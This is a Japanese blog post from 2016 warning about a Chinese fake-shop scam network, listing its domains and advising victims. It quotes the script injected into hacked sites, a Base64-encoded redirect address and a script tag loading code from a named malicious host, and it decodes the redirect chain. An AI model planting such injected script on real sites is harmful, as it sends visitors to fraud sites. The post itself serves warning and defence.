ここから本文です
☆女の徒然草☆
徒然なるままに、おんなもすなるブラというものをおとこもしてみんとてするなり

書庫全体表示

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/89/16428989/img_1?1344636633
https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/72/11814372/img_0?1301538305
(要約)
他人のサイトをハッキングしてBase64でエンコードされたアドレスを埋め込む手口を使う
中華人民共和国の詐欺サイト「生活雑貨」は、
新しく4サイトを作成してそちらへの誘導を始めています。

http://c.statcounter.com/4440886/0/1c5b0b72/0/ 

閲覧者接続情報 http://www.robtex.com/ipinfo.gif


他人のサイトをハッキングしてBase64でエンコードされたアドレスを埋め込む手口を使う
中華人民共和国の詐欺サイト「生活雑貨」は、
新しく4サイトを作成してそちらへの誘導を始めています。


■ 実際の寄生感染事例

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/25/20644225/img_1?1453279042
◆サムネールを見る


ブラウザのスクリプト動作を止めてページソースを確認するとこのような記述が見つかります。

<script type="text/javascript">
var  titleurl="aHR0cDovL2EyMy5zbm93LW1hcmtldC5jb20va2VuemFpLXlhb
WFzaGl0YS95YW5lc2lra3Vpa3VybzUuaHRtbA=="</script>
<script type="text/javascript" src="http://www.document-findobj.cc/ja/ja.js"></script>

寄生感染するためのスクリプトはこれです。

> http://www.document-findobj.cc/ja/ja.js
(このコードは、ページ本体に埋め込まれているパラメータを利用して他人のサイトページに自分の詐欺ページを上書きします)

そして、この暗号のような文字列がアドレスになっています。
aHR0cDovL2EyMy5zbm93LW1hcmtldC5jb20va2VuemFpLXlhbWFzaGl0YS95YW5lc2lra3Vpa3VybzUuaHRtbA==
解読すると
http://a23.snow-market.com/kenzai-yamashita/yanesikkuikuro5.html

このアドレスはページ移動させるリダイレクタになっており、次のアドレスへ移動させています。
http://www.donki-mall.com/kenzai-yamashita/yanesikkuikuro5.html


このような仕掛けですので過去に仕込んである暗号化されたアドレスも、リダイレクト設定を変更するだけで新しいサイトへと誘導できてしまうわけです。

ただしボトルネックがあり、寄生感染しているページに利用されているスクリプト自体を止めてしまうと感染機能は実行されません

ドメイン www.document-findobj.cc をファイアウォールに設定してください。


そして今回見付けた新しい4サイトは次の通りです。



それぞれの会社概要ページには、
架空の会社名番地などの記載がない住所が書いてあります。


hxxp://www.donki-mall.com/aboutus.aspx

Donki-mall株式会社
    〒9231268 石川県能美郡 川北町与九郎島
    店舗連絡先:donkimall02@gmail.com

hxxp://www.eliving-mall.com/aboutus.aspx

Boxtopshop株式会社
    〒557-0014 大阪府大阪市西成区天下茶屋
    店舗連絡先:elivingstore01@gmail.com

hxxp://www.kiyabazaar.com/aboutus.aspx

Kiya-bazaar株式会社
    〒463-0025 愛知県名古屋市守山区元郷
    店舗連絡先:kiyabazaar02@gmail.com

hxxp://www.ksbazaar.com/aboutus.aspx

Kes-bazaar株式会社
    〒919-1332 福井県三方上中郡若狭町館川
    店舗連絡先:kesbazaar@gmail.com

※ 責任者名も書いてありますが、これまでの被害者名である可能性もある事から省略します


なお以前に開設していたサイトは一部が閉鎖されていますが次の通り残っています。


残存している詐欺サイトに掲載してある会社概要


hxxp://www.baketushop.com/aboutus.aspx

Baketu-shop株式会社
    〒520-0104 滋賀県大津市比叡辻
    店舗連絡先:baketushop@gmail.com

hxxp://www.casilife.com/aboutus.aspx

Casilife Ltd,
    〒252-0226 神奈川県相模原市中央区陽光台
    店舗連絡先:sale@casilife.com

hxxp://www.kage-shop.com/aboutus.aspx

KageShop Ltd,
    〒731-1531 広島県山県郡北広島町春木小山
    店舗連絡先:sale@kage-shop.com

hxxp://www.knows-mall.com/aboutus.aspx

Know-small株式会社
    〒151-0066 東京都渋谷区西原
    店舗連絡先:knowsstore@gmail.com

hxxp://www.kool-store.com/aboutus.aspx

Koolstore Ltd,
    〒285-0862 千葉県佐倉市新臼井田
    店舗連絡先:sale@kool-store.com

hxxp://www.onlyone-store.com/aboutus.aspx

OnlyoneShop株式会社
    〒0030021 北海道札幌市白石区栄通
    店舗連絡先:onlyonewebshop@gmail.com

hxxp://www.piaryshop.com/aboutus.aspx

Piary-Shop 株式会社
    〒797-0045 愛媛県西予市宇和町坂戸
    店舗連絡先:sale@piaryshop.com

hxxp://www.shinwastore.com/aboutus.aspx

Shinwastore株式会社
    〒108-0023 東京都港区芝浦
    店舗連絡先:ivbuep133870@gmail.com

hxxp://www.sumicia-shop.com/aboutus.aspx

SumiciaShop Ltd,
    〒9400071 新潟県長岡市表町
    店舗連絡先:sale@sumicia-shop.com






以上はすべて中華人民共和国の詐欺サイトです。
しかも世界中のサイトへ迷惑を掛けて日本人の懐を狙っている悪質サイトです。



もし引っ掛ってしまったら。。。


 サイトへ登録した個人情報は・・・
他の詐欺サイト開設に利用される恐れがあります。
もしサイトへの登録情報を削除できるようでしたら削除し、
サイトへの登録情報を変更できるようでしたら、
氏名、住所、電話番号などをデタラメなものに修正しておいてください。
※ もより警察署の住所、電話番号を書いておくといいかも知れません。

 クレジットカードでの支払いなら・・・
クレジット会社に連絡してクレジットカードの停止と再発行をしてください。
クレジットカードの契約によっては犯罪被害補償を受けられることもあります。
詳しくはクレジット会社にお尋ねくださいね。

 銀行振り込みなら・・・
送金先の銀行に上の情報を伝えて、相手口座の凍結をしてもらってください。
警察へ申請するように促された場合は、その指示に従って下さい。
残金があれば被害者で按分することになります。

 代引でもゴミを送り付けてくる可能性があります。
ご家族を含めて、不審な荷物は受け取らないように周知徹底しておいてくださいね。



関連記事

【中国ハッキング詐欺】 サイト開設 ⇒ 即手配 の「生活雑貨」
http://blogs.yahoo.co.jp/yoshimy_s/20618287.html
( 2016/01/09(土) 12:49:30 )

【中国詐欺】 まとめて8サイト - 「生活雑貨」に注意!
http://blogs.yahoo.co.jp/yoshimy_s/20621485.html
( 2016/01/10(日) 20:20:23 )

【中国ハッキング詐欺】 「生活雑貨」 - さらに1サイトを検出
http://blogs.yahoo.co.jp/yoshimy_s/20625560.html
( 2016/01/12(火) 13:09:12 )

【中国ハッキング詐欺】 「生活雑貨」 - さらに3サイトを検出
http://blogs.yahoo.co.jp/yoshimy_s/20630537.html
( 2016/01/14(木) 19:31:28 )

【中国ハッキング詐欺】 「生活雑貨」 - 1サイトと別サイトも
http://blogs.yahoo.co.jp/yoshimy_s/20632331.html
( 2016/01/15(金) 16:04:14 )



  • アバター

    午後 1:02さん、こんにちわ
    お返事を出しておきました。

    よっしみ〜☆

    2016/1/21(木) 午後 2:31

  • アバター

    午後 5:26さん、こんばんわ
    削除も変更もできないのは仕方ないですね。
    個人情報を新たなサイトへ利用されて、
    詐欺犯人扱いされるのが一番怖いですから
    しばらくの間は、ご自身のお名前でネット検索して、
    悪用されていないかを確かめるようにして下さい。

    よっしみ〜☆

    2016/1/21(木) 午後 5:53

  • アバター

    午後 6:14さん、こんばんわ
    メールアドレスに関しましては、連絡すると詐欺サイトと判明する原因になりますから、悪用されることはないと思います。
    問題は名前と住所で、被害者があなたも共犯と勘違いして民事裁判を起こしてくる可能性がないわけでもありません。
    その頃になってサイトが消されていたりすると反証できなくなりますので、悪用されている場合にはその証拠としてページを日付入りで印刷しておくなどしておいてくださいね。

    よっしみ〜☆

    2016/1/21(木) 午後 7:26

  • 顔アイコン

    サイトに登録してしまいましたが
    どうすればいいのですか?

    [ shi*s*in*509*002 ]

    2016/1/22(金) 午前 1:02

  • アバター

    shi*s*in*509*002さん、こんにちわ
    このサイトは登録した個人情報の削除も変更もできないとの事ですから
    しばらくの間は、ご自身のお名前でネット検索して、
    悪用されていないかを確かめるようにして下さい。
    ただし電話番号やメールアドレスは、詐欺と判る原因となり易いので
    流用される恐れはほとんどありません。

    よっしみ〜☆

    2016/1/22(金) 午後 1:57

開くトラックバック(1)

本文はここまでですこのページの先頭へ
みんなの更新記事